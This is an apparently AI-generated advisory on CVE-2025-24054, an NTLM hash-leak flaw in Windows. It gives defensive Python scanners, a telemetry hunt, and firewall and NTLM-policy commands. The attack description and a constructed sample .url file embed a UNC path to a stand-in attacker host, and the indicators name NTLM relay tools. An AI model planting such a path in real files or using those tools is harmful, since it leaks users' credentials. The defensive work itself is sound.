CVE-2025-24054 Overview
CVE-2025-24054 is a spoofing vulnerability in Microsoft Windows NTLM caused by external control of a file name or path [CWE-73]. An unauthenticated attacker can coerce a Windows host into sending NTLM authentication material to an attacker-controlled endpoint over the network. Successful exploitation discloses NTLMv2-SSP hashes that can be relayed or cracked offline to impersonate the victim user. The flaw affects every supported version of Windows client and Windows Server, including Windows 10, Windows 11 24H2, and Windows Server 2025. CISA has added CVE-2025-24054 to the Known Exploited Vulnerabilities catalog, confirming active exploitation in the wild.
Critical Impact
Minimal user interaction with a crafted file (such as browsing a folder containing a malicious .library-ms file) triggers outbound NTLM authentication, leaking the user's NTLMv2 hash to a remote SMB server controlled by the attacker.
Affected Products
- Microsoft Windows 10 (1507, 1607, 1809, 21H2, 22H2) and Windows 11 (22H2, 23H2, 24H2)
- Microsoft Windows Server 2008 R2 SP1, Server 2012/2012 R2, Server 2016, Server 2019
- Microsoft Windows Server 2022, Server 2022 23H2, and Server 2025
Discovery Timeline
- 2025-03-11 - CVE-2025-24054 published to NVD by Microsoft as part of the March 2025 Patch Tuesday cycle
- 2025-04 - Public proof-of-concept exploits posted to the Full Disclosure mailing list and Exploit-DB (entries 52478 and 52480)
- 2026-02-13 - Last updated in NVD database
Technical Details for CVE-2025-24054
Vulnerability Analysis
The vulnerability resides in how Windows Explorer and related shell components parse files whose contents reference external network paths. Files such as .library-ms, .url, .lnk, and similar shell-handled formats accept UNC paths in fields the operating system resolves automatically. When the path points to a remote SMB share, the Windows NTLM client initiates authentication against the remote server before the user opens or executes the file. The attacker receives the resulting NTLMv2-SSP challenge/response, which encodes the victim's username, domain, and a hash of their password.
The attacker can then perform offline brute-force cracking against the hash or relay the authentication to another service (LDAP, SMB, HTTP) that accepts NTLM. Because the trigger is implicit file parsing rather than execution, traditional Mark-of-the-Web prompts and SmartScreen warnings are not displayed. The flaw is categorized as External Control of File Name or Path [CWE-73].
Root Cause
The shell handlers for several file types resolve attacker-supplied paths during enumeration, preview, or icon rendering. The resolution path does not validate or strip remote UNC targets, allowing an externally supplied value to drive NTLM authentication on behalf of the logged-in user.
Attack Vector
An attacker delivers a crafted file by email attachment, ZIP archive, shared network folder, or web download. The victim only needs to view the containing folder in Windows Explorer. Explorer parses the file metadata, follows the embedded UNC path (for example \\attacker.example.com\share\icon.ico), and Windows transmits NTLM credentials to the attacker's responder server. No double-click or execution is required.
The vulnerability mechanism is documented in the Microsoft Security Update Guide and demonstrated in the Full Disclosure post from April 2025 and Exploit-DB entry 52478.
Detection Methods for CVE-2025-24054
Indicators of Compromise
- Outbound SMB (TCP/445) or WebDAV (TCP/80/443) traffic from user workstations to untrusted external IP addresses or domains.
- Inbound delivery of archives containing .library-ms, .url, .lnk, .search-ms, or .website files with embedded UNC paths.
- Windows Security event ID 4624/4625 logon events showing NTLM authentication originating from anomalous source hosts.
- Responder, Inveigh, or ntlmrelayx tool signatures observed in network capture or proxy logs.
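The gateway check described in the indicators above (archives carrying shell metadata files with embedded UNC paths) and in the first detection strategy below can be implemented as a small content scanner. The following is an added example written for this page, not code from Microsoft, CISA or any vendor named here. It scans a ZIP attachment in memory, extracts every UNC or file:// target from files with the listed extensions, and reports those pointing outside the organization. The internal address ranges, the .corp.local DNS suffix, the host attacker.example.com (taken from the advisory's own example path) and the sample archive are all constructed for the demonstration.

```python
from __future__ import annotations

import io
import ipaddress
import re
import zipfile

# Shell-handled file types named in the advisory; Explorer resolves paths inside
# them while merely listing a folder, so a remote UNC target in one is a leak trigger.
SHELL_METADATA_EXTS = (".library-ms", ".url", ".lnk", ".search-ms", ".website")

# Placeholder internal ranges and DNS suffix (assumed); replace with your own allocations.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
INTERNAL_SUFFIXES = (".corp.local",)

# UNC path (\\host\...) or file:// URL; group 1 is the target host.
# Local file:///C:/... URLs do not match because ":" is not a valid host character here.
UNC_RE = re.compile(r"(?:\\\\|file:/{2,})([A-Za-z0-9._-]+)(?=[\\/\s\"'<]|$)", re.IGNORECASE)


def extract_remote_hosts(data: bytes) -> set[str]:
    """Return every host referenced by a UNC path or file:// URL in raw file bytes.

    A second pass with NUL bytes stripped catches UTF-16LE strings, the encoding
    .lnk files use for their path data.
    """
    text = data.decode("latin-1")
    hosts: set[str] = set()
    for view in (text, text.replace("\x00", "")):
        for match in UNC_RE.finditer(view):
            hosts.add(match.group(1).lower())
    return hosts


def is_external(host: str) -> bool:
    """A target is external unless it is an internal IP range or an internal DNS name."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return not host.lower().endswith(INTERNAL_SUFFIXES)
    return not any(addr in net for net in INTERNAL_NETS)


def scan_archive(zip_bytes: bytes) -> list[dict]:
    """Scan a ZIP held in memory; report shell metadata files referencing external hosts."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(SHELL_METADATA_EXTS):
                continue
            external = sorted(h for h in extract_remote_hosts(zf.read(info)) if is_external(h))
            if external:
                findings.append({"file": info.filename, "external_hosts": external})
    return findings


def build_sample_archive() -> bytes:
    """Constructed sample: a benign note, a .url whose icon resolves to an external
    host, and a .library-ms that only references an internal share."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "Quarterly figures attached.")
        zf.writestr(
            "Invoice.url",
            "[InternetShortcut]\r\nURL=https://intranet.corp.local/\r\n"
            "IconFile=\\\\attacker.example.com\\share\\icon.ico\r\nIconIndex=0\r\n",
        )
        zf.writestr(
            "Shared.library-ms",
            '<?xml version="1.0"?><libraryDescription>'
            "<url>\\\\fileserver01.corp.local\\docs</url></libraryDescription>",
        )
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_archive(build_sample_archive()):
        print(f"QUARANTINE {finding['file']}: references {', '.join(finding['external_hosts'])}")
```

The scanner deliberately ignores each format's internal structure and flags any remote target in the raw bytes, so it does not need to be updated when a new field or format variant is found to trigger the same resolution; the cost is that a benign internal UNC must be excluded through the internal ranges and suffixes rather than by field.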
Detection Strategies
- Inspect email gateways and download proxies for archives containing shell metadata file types and quarantine those referencing external UNC paths.
- Hunt in endpoint telemetry for explorer.exe initiating SMB connections to public IP ranges, which is anomalous on managed endpoints.
- Correlate firewall egress logs with workstation source IPs to surface any TCP/445 traffic leaving the corporate perimeter.
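The endpoint hunt in the second strategy (a shell process opening SMB or WebDAV connections to non-internal addresses) can be expressed as a filter over network-connection telemetry. The following is an added example for this page, not code from any vendor or tool named here. It runs over constructed, Sysmon Event ID 3-like lines in a simplified key=value layout (not Sysmon's real XML or EVTX encoding); the internal address ranges, user names and destination addresses are all assumed for the demonstration.

```python
from __future__ import annotations

import ipaddress
from collections import Counter

# Address ranges treated as internal (assumed placeholder list); documentation
# ranges such as 198.51.100.0/24 are deliberately not listed so they count as external.
INTERNAL_NETS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")
]

# Ports over which Windows sends NTLM to a remote file server (SMB, then WebDAV fallback).
SMB_PORTS = {445, 139}
WEBDAV_PORTS = {80, 443}

# Processes that resolve shell metadata. Extend with "system" or "svchost.exe" if your
# sensor attributes SMB redirector or WebClient traffic to those images instead.
SHELL_PROCESSES = {"explorer.exe"}

# Constructed sample telemetry; values contain no spaces so whitespace splitting is safe.
SAMPLE_EVENTS = [
    # Internal file server on TCP/445: expected, not flagged.
    "EventID=3 Image=C:\\Windows\\explorer.exe User=CORP\\alice DestinationIp=10.20.30.40 DestinationPort=445 Protocol=tcp",
    # explorer.exe speaking SMB to a non-internal address: the hash-leak signature.
    "EventID=3 Image=C:\\Windows\\explorer.exe User=CORP\\alice DestinationIp=198.51.100.23 DestinationPort=445 Protocol=tcp",
    # A browser reaching the same host over HTTPS: not a shell process, ignored here.
    "EventID=3 Image=C:\\Tools\\browser.exe User=CORP\\alice DestinationIp=198.51.100.23 DestinationPort=443 Protocol=tcp",
    # explorer.exe WebDAV fallback to an external host: lower confidence, still reported.
    "EventID=3 Image=C:\\Windows\\explorer.exe User=CORP\\bob DestinationIp=198.51.100.23 DestinationPort=80 Protocol=tcp",
    # Process-creation event, wrong EventID, ignored.
    "EventID=1 Image=C:\\Windows\\explorer.exe User=CORP\\bob CommandLine=explorer.exe",
    # Internal NetBIOS session: ignored.
    "EventID=3 Image=C:\\Windows\\explorer.exe User=CORP\\carol DestinationIp=192.168.1.7 DestinationPort=139 Protocol=tcp",
]


def parse_event(line: str) -> dict[str, str]:
    """Parse one 'key=value key=value' telemetry line into a dict."""
    fields: dict[str, str] = {}
    for token in line.split():
        key, sep, value = token.partition("=")
        if sep:
            fields[key] = value
    return fields


def is_internal_ip(ip: str) -> bool:
    """True when the address falls inside one of the configured internal ranges."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)


def hunt_shell_smb_egress(lines: list[str]) -> list[dict[str, str]]:
    """Return connection events where a shell process reached a non-internal address
    on an SMB or WebDAV port; each hit is labelled with the transport used."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "3":
            continue
        image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
        if image not in SHELL_PROCESSES:
            continue
        try:
            port = int(ev.get("DestinationPort", "0"))
        except ValueError:
            continue
        if port not in SMB_PORTS | WEBDAV_PORTS:
            continue
        dest = ev.get("DestinationIp", "")
        if is_internal_ip(dest):
            continue
        hits.append({
            "user": ev.get("User", "?"),
            "dest": dest,
            "port": str(port),
            "kind": "smb" if port in SMB_PORTS else "webdav",
        })
    return hits


def summarize_by_destination(hits: list[dict[str, str]]) -> dict[str, int]:
    """Count hits per destination so the most-contacted external host is triaged first."""
    return dict(Counter(h["dest"] for h in hits))


if __name__ == "__main__":
    for hit in hunt_shell_smb_egress(SAMPLE_EVENTS):
        print(f"[{hit['kind']}] {hit['user']} -> {hit['dest']}:{hit['port']}")
    print(summarize_by_destination(hunt_shell_smb_egress(SAMPLE_EVENTS)))
```

Before relying on the process name, confirm how your sensor attributes these connections: the SMB redirector runs in the kernel and the WebDAV client in the WebClient service, so some telemetry records the connecting image as System or svchost.exe rather than explorer.exe. The firewall-egress correlation in the third strategy is the fallback that does not depend on process attribution at all.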
Monitoring Recommendations
- Enable Windows Defender Firewall outbound rules to log SMB egress attempts and alert on matches.
- Forward NTLM auditing events (event IDs 8001-8004 from the Microsoft-Windows-NTLM/Operational log, which is only populated once the Restrict NTLM audit or deny policies are enabled) to a SIEM for correlation.
- Track CISA KEV catalog updates via the CISA Known Exploited Vulnerabilities entry for related advisories.
How to Mitigate CVE-2025-24054
Immediate Actions Required
- Apply the March 2025 Microsoft security updates to all affected Windows client and Server SKUs without delay.
- Block outbound TCP/445, TCP/139, and unauthenticated WebDAV at the perimeter firewall to prevent NTLM hash exfiltration.
- Enforce SMB signing and Extended Protection for Authentication (EPA) on internal services to defeat NTLM relay.
- Identify and prioritize remediation for internet-facing or roaming endpoints that can reach arbitrary external SMB hosts.
Patch Information
Microsoft released patches addressing CVE-2025-24054 in the March 2025 cumulative update. Details and download links are available from the Microsoft Security Update Guide for CVE-2025-24054. A community-maintained mitigation script is published by Vicarius vSociety.
Workarounds
- Configure the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" group policy to "Deny all" (or "Audit all" first) and add explicit exceptions for required internal destinations.
- Disable NTLM authentication in favor of Kerberos where feasible, and remove legacy fallback paths.
- Use host firewall rules to restrict SMB client traffic so that explorer.exe cannot reach external networks on TCP/445.
# Example: block outbound SMB on Windows hosts via PowerShell (run from an elevated prompt)
New-NetFirewallRule -DisplayName "Block Outbound SMB 445" `
    -Direction Outbound `
    -Action Block `
    -Protocol TCP `
    -RemotePort 445 `
    -Profile Any
# Restrict outgoing NTLM to remote servers. RestrictSendingNTLMTraffic values:
# 0 = allow all, 1 = audit all (logs event 8001, blocks nothing), 2 = deny all.
# Set 1 first, review the NTLM operational log for legitimate targets, then set 2.
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" `
    /v RestrictSendingNTLMTraffic /t REG_DWORD /d 2 /f
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.